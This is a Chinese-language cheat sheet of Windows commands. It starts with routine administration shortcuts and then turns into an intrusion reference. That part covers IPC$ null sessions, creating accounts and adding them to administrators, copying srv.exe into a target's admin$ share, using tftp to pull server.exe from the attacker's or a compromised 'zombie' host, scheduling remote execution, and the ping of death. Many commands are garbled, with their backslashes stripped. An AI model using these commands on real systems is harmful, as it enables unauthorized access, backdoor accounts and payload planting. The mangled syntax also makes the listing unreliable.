僅節錄我個人常用的
SFC /scannow 檢查系統檔案
lusrmgr.msc 群組和使用者
diskmgmt.msc 磁碟管理
compmgmt.msc 電腦管理
netplwiz 管理密碼及登入
hdwwiz.cpl devmgmt.msc 裝置管理員
ncpa.cpl 網路管理
perfmon.msc 效能監視
control 控制台
\ 直接開C:
services.msc 服務
firewall.cpl 防火牆
msconfig 開機管理
sysdm.cpl 進階設定 > 環境變數在這裡
taskschd.msc 工作排程
optionalfeatures 檢查SMBV1
wiaacmgr 掃描工具
secpol.msc
rsop.msc
winver
taskmgr
mstsc
magnify
nslookup
eventvwr
MMSYS.cpl
control Printers
net use ipipc$ " " /user:" " 建立IPC空連結
net use ipipc$ "密碼" /user:"使用者名稱" 建立IPC非空連結
net use h: ipc$ "密碼" /user:"使用者名稱" 直接登陸後對映對方C:到本地為H:
net use h: ipc$ 登陸後對映對方C:到本地為H:
net use ipipc$ /del 刪除IPC連結
net use h: /del 刪除對映對方到本地的為H:的對映
net user 使用者名稱 密碼 /add 建立使用者
net user guest /active:yes 啟用guest使用者
net user 檢視有哪些使用者
net user 帳戶名 檢視帳戶的屬性
net localgroup administrators 使用者名稱 /add 把“使用者”新增到管理員中使其具有管理員許可權
net start 檢視開啟了哪些服務
net start 服務名 開啟服務;(如:net start telnet, net start schedule)
net stop 服務名 停止某服務
net time 目標ip 檢視對方時間
net time 目標ip /set 設定本地計算機時間與“目標IP”主機的時間同步,加上引數/yes可取消確認資訊
net view 檢視本地區域網內開啟了哪些共享
net view ip 檢視對方區域網內開啟了哪些共享
net config 顯示系統網路設定
net logoff 斷開連線的共享
net pause 服務名 暫停某服務
net send ip "文字資訊" 向對方發資訊
net ver 區域網內正在使用的網路連線型別和資訊
net share 檢視本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C:共享
net user guest 12345 用guest使用者登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a 檢視開啟了哪些埠,常用netstat -an
netstat -n 檢視埠的網路連線情況,常用netstat -an
netstat -v 檢視正在進行的工作
netstat -p 協議名 例:netstat -p tcq/ip 檢視某協議使用情況
netstat -s 檢視正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個埠開了的話,就可檢視對方最近登陸的使用者名稱
tracert -引數 ip(或計算機名) 跟蹤路由(資料包),引數:“-w數字”用於設定超時間隔。
ping ip(或域名) 向對方主機傳送預設大小為32位元組的資料,引數:“-l[空格]資料包大小”;“-n傳送資料次數”;“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(傳送大於64K的檔案並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)檢視本地ip地址,ipconfig可用引數“/all”顯示全部配置資訊
tlist -t 以樹行列表顯示程序(為系統的附加工具,預設是沒有安裝的,在安裝目錄的Support/tools資料夾內)
kill -F 程序名 加-F引數後強制結束某程序(為系統的附加工具,預設是沒有安裝的,在安裝目錄的Support/tools資料夾內)
del -F 檔名 加-F引數後就可刪除只讀檔案,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔檔案,/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的檔案。例如“DEL/AR *.*”表示刪除當前目錄下所有隻讀檔案,“DEL/A-S *.*”表示刪除當前目錄下除系統檔案以外的所有檔案
del /S /Q 目錄 或用:rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和檔案。同時使用引數/Q 可取消刪除操作時的系統確認就直接刪除。(二個命令作用相同)
move 碟符路徑要移動的檔名 存放移動檔案的路徑移動後檔名 移動檔案,用引數/y將取消確認移動目錄存在相同檔案的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對比二個檔案並把不同之處輸出到3st.txt檔案中,"> "和"> >" 是重定向命令
at id號 開啟已註冊的某個計畫任務
at /delete 停止所有計畫任務,用引數/yes則不需要確認就直接停止
at id號 /delete 停止某個已註冊的計畫任務
at 檢視所有的計畫任務
at ip time 程式名(或一個命令) /r 在某時間執行對方某程式並重新啟動計算機
finger username @host 檢視最近有哪些使用者登陸
telnet ip 埠 遠和登陸伺服器,預設埠為23
open ip 連線到IP(屬telnet登陸後的命令)
telnet 在本機上直接鍵入telnet 將進入本機的telnet
copy 路徑檔名1 路徑檔名2 /y 複製檔案1到指定的目錄為檔案2,用引數/y就同時取消確認你要改寫一份現存目錄檔案
copy c:srv.exe ipadmin$ 複製本地c:srv.exe到對方的admin下
copy 1st.jpg/b 2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的檔案,註:2st.txt檔案頭要空三排,引數:/b指二進位制檔案,/a指ASCLL格式檔案
copy ipadmin$svv.exe c: 或:copyipadmin$*.* 複製對方admini$共享下的srv.exe檔案(所有檔案)至本地C:
xcopy 要複製的檔案或目錄樹 目標地址目錄名 複製檔案和目錄樹,用引數/Y將不提示覆蓋相同檔案
用引數/e才可連目錄下的子目錄一起複製到目標地址下。
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exec:server.exe 登陸後,將“IP”的server.exe下載到目標主機c:server.exe 引數:-i指以二進位制模式傳送,如傳送exe檔案時用,如不加-i 則以ASCII模式(傳送文字檔案模式)進行傳送
tftp -i 對方IP put c:server.exe 登陸後,上傳本地c:server.exe至主機
ftp ip 埠 用於上傳檔案至伺服器或進行檔案操作,預設埠為21。bin指用二進位制方式傳送(可執行檔案進);預設為ASCII格式傳送(文字檔案時)
route print 顯示出IP路由,將主要顯示網路地址Network addres,子網掩碼Netmask,閘道器地址Gateway addres,介面地址Interface
arp 檢視和處理ARP快取,ARP是名字解析的意思,負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部資訊
start 程式名或命令 /max 或/min 新開一個新視窗並最大化(最小化)執行某程式或命令
mem 檢視cpu使用情況
attrib 檔名(目錄名) 檢視某檔案(目錄)的屬性
attrib 檔名 -A -R -S -H 或 A R S H 去掉(新增)某檔案的 存檔,只讀,系統,隱藏 屬性;用 則是新增為某屬性
dir 檢視檔案,引數:/Q顯示檔案及目錄屬系統哪個使用者,/T:C顯示檔案建立時間,/T:A顯示檔案上次被訪問時間,/T:W上次被修改時間
date /t 、 time /t 使用此引數即“DATE/T”、“TIME/T”將只顯示當前日期和時間,而不必輸入新日期和時間
set 指定環境變數名稱=要指派給變數的字元 設定環境變數
set 顯示當前所有的環境變數
set p(或其它字元) 顯示出當前以字元p(或其它字元)開頭的所有環境變數
pause 暫停批處理程式,並顯示出:請按任意鍵繼續....
if 在批處理程式中執行條件處理(更多說明見if命令及變數)
goto 標籤 將cmd.exe導向到批處理程式中帶標籤的行(標籤必須單獨一行,且以冒號打頭,例如:“:start”標籤)
call 路徑批處理檔名 從批處理程式中呼叫另一個批處理程式 (更多說明見call /?)
for 對一組檔案中的每一個檔案執行某個特定命令(更多說明見for命令及變數)
echo on或off 開啟或關閉echo,僅用echo不加引數則顯示當前echo設定
echo 資訊 在螢幕上顯示出資訊
echo 資訊 >> pass.txt 將"資訊"儲存到pass.txt檔案中
findstr "Hello" aa.txt 在aa.txt檔案中尋找字串hello
find 檔名 查詢某檔案
title 標題名字 更改CMD視窗標題名字
color 顏色值 設定cmd控制檯前景和背景顏色;0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:、D:統一改為:EntSky )
ver 在DOS視窗下顯示版本資訊
winver 彈出一個視窗顯示版本資訊(記憶體大小、系統版本、補丁版本、計算機名)
format 碟符 /FS:型別 格式化磁碟,型別:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
md 目錄名 建立目錄
replace 原始檔 要替換檔案的目錄 替換檔案
ren 原檔名 新檔名 重新命名檔名
tree 以樹形結構顯示出目錄,用引數-f 將列出第個資料夾中檔名稱
type 檔名 顯示文字檔案的內容
more 檔名 逐屏顯示輸出檔案
doskey 要鎖定的命令=字元
doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令列,重新呼叫win2k命令,並建立巨集)。如:鎖定dir命令:doskey dir=entsky (不能用doskey dir=dir);解鎖:doskey dir=
taskmgr 調出工作管理員
chkdsk /F D: 檢查磁碟D並顯示狀態報告;加引數/f並修復磁碟上的錯誤
tlntadmn telnt服務admn,鍵入tlntadmn選擇3,再選擇8,就可以更改telnet服務預設埠23為其它任何埠
exit 退出cmd.exe程式或目前,用引數/B則是退出當前批處理指令碼而不是cmd.exe
path 路徑可執行檔案的檔名 為可執行檔案設定一個路徑。
cmd 啟動一個win2K命令解釋視窗。引數:/eff、/en 關閉、開啟命令擴充套件;更我詳細說明見cmd /?
regedit /s 登錄檔檔名 匯入登錄檔;引數/S指安靜模式匯入,無任何提示;
regedit /e 登錄檔檔名 匯出登錄檔
cacls 檔名 引數 顯示或修改檔案訪問控制列表(ACL)——針對NTFS格式時。引數:/D 使用者名稱:設定拒絕某使用者訪問;/P 使用者名稱:perm 替換指定使用者的訪問許可權;/G 使用者名稱:perm 賦予指定使用者訪問許可權;Perm 可以是: N 無,R 讀取, W 寫入, C 更改(寫入),F 完全控制;例:cacls D: est.txt /D pub 設定d: est.txt拒絕pub使用者訪問。
cacls 檔名 檢視檔案的訪問使用者許可權列表
REM 文字內容 在批處理檔案中新增註解
netsh 檢視或更改本地網路配置情況